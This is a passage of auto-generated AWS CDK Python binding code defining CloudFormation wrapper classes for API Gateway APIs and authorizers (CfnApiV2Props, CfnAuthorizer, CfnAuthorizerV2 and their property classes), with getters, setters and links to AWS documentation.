"""``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-apikeyselectionexpression
"""
return jsii.get(self, "apiKeySelectionExpression")
@api_key_selection_expression.setter
def api_key_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "apiKeySelectionExpression", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="disableSchemaValidation")
def disable_schema_validation(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-disableschemavalidation
"""
return jsii.get(self, "disableSchemaValidation")
@disable_schema_validation.setter
def disable_schema_validation(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "disableSchemaValidation", value)
@property
@jsii.member(jsii_name="version")
def version(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-version
"""
return jsii.get(self, "version")
@version.setter
def version(self, value: typing.Optional[str]):
return jsii.set(self, "version", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiV2Props", jsii_struct_bases=[], name_mapping={'name': 'name', 'protocol_type': 'protocolType', 'route_selection_expression': 'routeSelectionExpression', 'api_key_selection_expression': 'apiKeySelectionExpression', 'description': 'description', 'disable_schema_validation': 'disableSchemaValidation', 'tags': 'tags', 'version': 'version'})
class CfnApiV2Props():
def __init__(self, *, name: str, protocol_type: str, route_selection_expression: str, api_key_selection_expression: typing.Optional[str]=None, description: typing.Optional[str]=None, disable_schema_validation: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, tags: typing.Any=None, version: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Api``.
:param name: ``AWS::ApiGatewayV2::Api.Name``.
:param protocol_type: ``AWS::ApiGatewayV2::Api.ProtocolType``.
:param route_selection_expression: ``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
:param api_key_selection_expression: ``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
:param description: ``AWS::ApiGatewayV2::Api.Description``.
:param disable_schema_validation: ``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
:param tags: ``AWS::ApiGatewayV2::Api.Tags``.
:param version: ``AWS::ApiGatewayV2::Api.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html
"""
self._values = {
'name': name,
'protocol_type': protocol_type,
'route_selection_expression': route_selection_expression,
}
if api_key_selection_expression is not None: self._values["api_key_selection_expression"] = api_key_selection_expression
if description is not None: self._values["description"] = description
if disable_schema_validation is not None: self._values["disable_schema_validation"] = disable_schema_validation
if tags is not None: self._values["tags"] = tags
if version is not None: self._values["version"] = version
@property
def name(self) -> str:
"""``AWS::ApiGatewayV2::Api.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-name
"""
return self._values.get('name')
@property
def protocol_type(self) -> str:
"""``AWS::ApiGatewayV2::Api.ProtocolType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-protocoltype
"""
return self._values.get('protocol_type')
@property
def route_selection_expression(self) -> str:
"""``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-routeselectionexpression
"""
return self._values.get('route_selection_expression')
@property
def api_key_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-apikeyselectionexpression
"""
return self._values.get('api_key_selection_expression')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-description
"""
return self._values.get('description')
@property
def disable_schema_validation(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-disableschemavalidation
"""
return self._values.get('disable_schema_validation')
@property
def tags(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Api.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-tags
"""
return self._values.get('tags')
@property
def version(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-version
"""
return self._values.get('version')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnApiV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnAuthorizer(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizer"):
"""A CloudFormation ``AWS::ApiGateway::Authorizer``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Authorizer
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, type: str, authorizer_credentials: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, authorizer_uri: typing.Optional[str]=None, auth_type: typing.Optional[str]=None, identity_source: typing.Optional[str]=None, identity_validation_expression: typing.Optional[str]=None, name: typing.Optional[str]=None, provider_arns: typing.Optional[typing.List[str]]=None) -> None:
"""Create a new ``AWS::ApiGateway::Authorizer``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::Authorizer.RestApiId``.
:param type: ``AWS::ApiGateway::Authorizer.Type``.
:param authorizer_credentials: ``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
:param authorizer_uri: ``AWS::ApiGateway::Authorizer.AuthorizerUri``.
:param auth_type: ``AWS::ApiGateway::Authorizer.AuthType``.
:param identity_source: ``AWS::ApiGateway::Authorizer.IdentitySource``.
:param identity_validation_expression: ``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
:param name: ``AWS::ApiGateway::Authorizer.Name``.
:param provider_arns: ``AWS::ApiGateway::Authorizer.ProviderARNs``.
"""
props = CfnAuthorizerProps(rest_api_id=rest_api_id, type=type, authorizer_credentials=authorizer_credentials, authorizer_result_ttl_in_seconds=authorizer_result_ttl_in_seconds, authorizer_uri=authorizer_uri, auth_type=auth_type, identity_source=identity_source, identity_validation_expression=identity_validation_expression, name=name, provider_arns=provider_arns)
jsii.create(CfnAuthorizer, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Authorizer.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="type")
def type(self) -> str:
"""``AWS::ApiGateway::Authorizer.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-type
"""
return jsii.get(self, "type")
@type.setter
def type(self, value: str):
return jsii.set(self, "type", value)
@property
@jsii.member(jsii_name="authorizerCredentials")
def authorizer_credentials(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizercredentials
"""
return jsii.get(self, "authorizerCredentials")
@authorizer_credentials.setter
def authorizer_credentials(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerCredentials", value)
@property
@jsii.member(jsii_name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizerresultttlinseconds
"""
return jsii.get(self, "authorizerResultTtlInSeconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "authorizerResultTtlInSeconds", value)
@property
@jsii.member(jsii_name="authorizerUri")
def authorizer_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizeruri
"""
return jsii.get(self, "authorizerUri")
@authorizer_uri.setter
def authorizer_uri(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerUri", value)
@property
@jsii.member(jsii_name="authType")
def auth_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authtype
"""
return jsii.get(self, "authType")
@auth_type.setter
def auth_type(self, value: typing.Optional[str]):
return jsii.set(self, "authType", value)
@property
@jsii.member(jsii_name="identitySource")
def identity_source(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identitysource
"""
return jsii.get(self, "identitySource")
@identity_source.setter
def identity_source(self, value: typing.Optional[str]):
return jsii.set(self, "identitySource", value)
@property
@jsii.member(jsii_name="identityValidationExpression")
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identityvalidationexpression
"""
return jsii.get(self, "identityValidationExpression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: typing.Optional[str]):
return jsii.set(self, "identityValidationExpression", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="providerArns")
def provider_arns(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Authorizer.ProviderARNs``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-providerarns
"""
return jsii.get(self, "providerArns")
@provider_arns.setter
def provider_arns(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "providerArns", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizerProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'type': 'type', 'authorizer_credentials': 'authorizerCredentials', 'authorizer_result_ttl_in_seconds': 'authorizerResultTtlInSeconds', 'authorizer_uri': 'authorizerUri', 'auth_type': 'authType', 'identity_source': 'identitySource', 'identity_validation_expression': 'identityValidationExpression', 'name': 'name', 'provider_arns': 'providerArns'})
class CfnAuthorizerProps():
def __init__(self, *, rest_api_id: str, type: str, authorizer_credentials: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, authorizer_uri: typing.Optional[str]=None, auth_type: typing.Optional[str]=None, identity_source: typing.Optional[str]=None, identity_validation_expression: typing.Optional[str]=None, name: typing.Optional[str]=None, provider_arns: typing.Optional[typing.List[str]]=None):
"""Properties for defining a ``AWS::ApiGateway::Authorizer``.
:param rest_api_id: ``AWS::ApiGateway::Authorizer.RestApiId``.
:param type: ``AWS::ApiGateway::Authorizer.Type``.
:param authorizer_credentials: ``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
:param authorizer_uri: ``AWS::ApiGateway::Authorizer.AuthorizerUri``.
:param auth_type: ``AWS::ApiGateway::Authorizer.AuthType``.
:param identity_source: ``AWS::ApiGateway::Authorizer.IdentitySource``.
:param identity_validation_expression: ``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
:param name: ``AWS::ApiGateway::Authorizer.Name``.
:param provider_arns: ``AWS::ApiGateway::Authorizer.ProviderARNs``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html
"""
self._values = {
'rest_api_id': rest_api_id,
'type': type,
}
if authorizer_credentials is not None: self._values["authorizer_credentials"] = authorizer_credentials
if authorizer_result_ttl_in_seconds is not None: self._values["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
if authorizer_uri is not None: self._values["authorizer_uri"] = authorizer_uri
if auth_type is not None: self._values["auth_type"] = auth_type
if identity_source is not None: self._values["identity_source"] = identity_source
if identity_validation_expression is not None: self._values["identity_validation_expression"] = identity_validation_expression
if name is not None: self._values["name"] = name
if provider_arns is not None: self._values["provider_arns"] = provider_arns
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Authorizer.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-restapiid
"""
return self._values.get('rest_api_id')
@property
def type(self) -> str:
"""``AWS::ApiGateway::Authorizer.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-type
"""
return self._values.get('type')
@property
def authorizer_credentials(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizercredentials
"""
return self._values.get('authorizer_credentials')
@property
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizerresultttlinseconds
"""
return self._values.get('authorizer_result_ttl_in_seconds')
@property
def authorizer_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizeruri
"""
return self._values.get('authorizer_uri')
@property
def auth_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authtype
"""
return self._values.get('auth_type')
@property
def identity_source(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identitysource
"""
return self._values.get('identity_source')
@property
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identityvalidationexpression
"""
return self._values.get('identity_validation_expression')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-name
"""
return self._values.get('name')
@property
def provider_arns(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Authorizer.ProviderARNs``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-providerarns
"""
return self._values.get('provider_arns')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnAuthorizerProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnAuthorizerV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizerV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Authorizer``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Authorizer
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, authorizer_type: str, authorizer_uri: str, identity_source: typing.List[str], name: str, authorizer_credentials_arn: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, identity_validation_expression: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Authorizer``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Authorizer.ApiId``.
:param authorizer_type: ``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
:param authorizer_uri: ``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
:param identity_source: ``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
:param name: ``AWS::ApiGatewayV2::Authorizer.Name``.
:param authorizer_credentials_arn: ``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
:param identity_validation_expression: ``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
"""
props = CfnAuthorizerV2Props(api_id=api_id, authorizer_type=authorizer_type, authorizer_uri=authorizer_uri, identity_source=identity_source, name=name, authorizer_credentials_arn=authorizer_credentials_arn, authorizer_result_ttl_in_seconds=authorizer_result_ttl_in_seconds, identity_validation_expression=identity_validation_expression)
jsii.create(CfnAuthorizerV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="authorizerType")
def authorizer_type(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizertype
"""
return jsii.get(self, "authorizerType")
@authorizer_type.setter
def authorizer_type(self, value: str):
return jsii.set(self, "authorizerType", value)
@property
@jsii.member(jsii_name="authorizerUri")
def authorizer_uri(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizeruri
"""
return jsii.get(self, "authorizerUri")
@authorizer_uri.setter
def authorizer_uri(self, value: str):
return jsii.set(self, "authorizerUri", value)
@property
@jsii.member(jsii_name="identitySource")
def identity_source(self) -> typing.List[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identitysource
"""
return jsii.get(self, "identitySource")
@identity_source.setter
def identity_source(self, value: typing.List[str]):
return jsii.set(self, "identitySource", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="authorizerCredentialsArn")
def authorizer_credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizercredentialsarn
"""
return jsii.get(self, "authorizerCredentialsArn")
@authorizer_credentials_arn.setter
def authorizer_credentials_arn(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerCredentialsArn", value)
@property
@jsii.member(jsii_name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizerresultttlinseconds
"""
return jsii.get(self, "authorizerResultTtlInSeconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "authorizerResultTtlInSeconds", value)
@property
@jsii.member(jsii_name="identityValidationExpression")
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identityvalidationexpression
"""
return jsii.get(self, "identityValidationExpression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: typing.Optional[str]):
return jsii.set(self, "identityValidationExpression", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizerV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'authorizer_type': 'authorizerType', 'authorizer_uri': 'authorizerUri', 'identity_source': 'identitySource', 'name': 'name', 'authorizer_credentials_arn': 'authorizerCredentialsArn', 'authorizer_result_ttl_in_seconds': 'authorizerResultTtlInSeconds', 'identity_validation_expression': 'identityValidationExpression'})
class CfnAuthorizerV2Props():
def __init__(self, *, api_id: str, authorizer_type: str, authorizer_uri: str, identity_source: typing.List[str], name: str, authorizer_credentials_arn: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, identity_validation_expression: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Authorizer``.
:param api_id: ``AWS::ApiGatewayV2::Authorizer.ApiId``.
:param authorizer_type: ``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
:param authorizer_uri: ``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
:param identity_source: ``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
:param name: ``AWS::ApiGatewayV2::Authorizer.Name``.
:param authorizer_credentials_arn: ``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGatewayV2::Authorizer.AuthorizerResultTtlInSeconds``.
:param identity_validation_expression: ``AWS::ApiGatewayV2::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html
"""
self._values = {
'api_id': api_id,
'authorizer_type': authorizer_type,
'authorizer_uri': authorizer_uri,
'identity_source': identity_source,
'name': name,
}
if authorizer_credentials_arn is not None: self._values["authorizer_credentials_arn"] = authorizer_credentials_arn
if authorizer_result_ttl_in_seconds is not None: self._values["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
if identity_validation_expression is not None: self._values["identity_validation_expression"] = identity_validation_expression
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-apiid
"""
return self._values.get('api_id')
@property
def authorizer_type(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizertype
"""
return self._values.get('authorizer_type')
@property
def authorizer_uri(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizeruri
"""
return self._values.get('authorizer_uri')
@property
def identity_source(self) -> typing.List[str]:
"""``AWS::ApiGatewayV2::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-identitysource
"""
return self._values.get('identity_source')
@property
def name(self) -> str:
"""``AWS::ApiGatewayV2::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-name
"""
return self._values.get('name')
@property
def authorizer_credentials_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Authorizer.AuthorizerCredentialsArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-authorizer.html#cfn-apigatewayv2-authorizer-authorizercredentialsarn
"""
return self._values.get('authorizer_credentials_arn')
@property
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
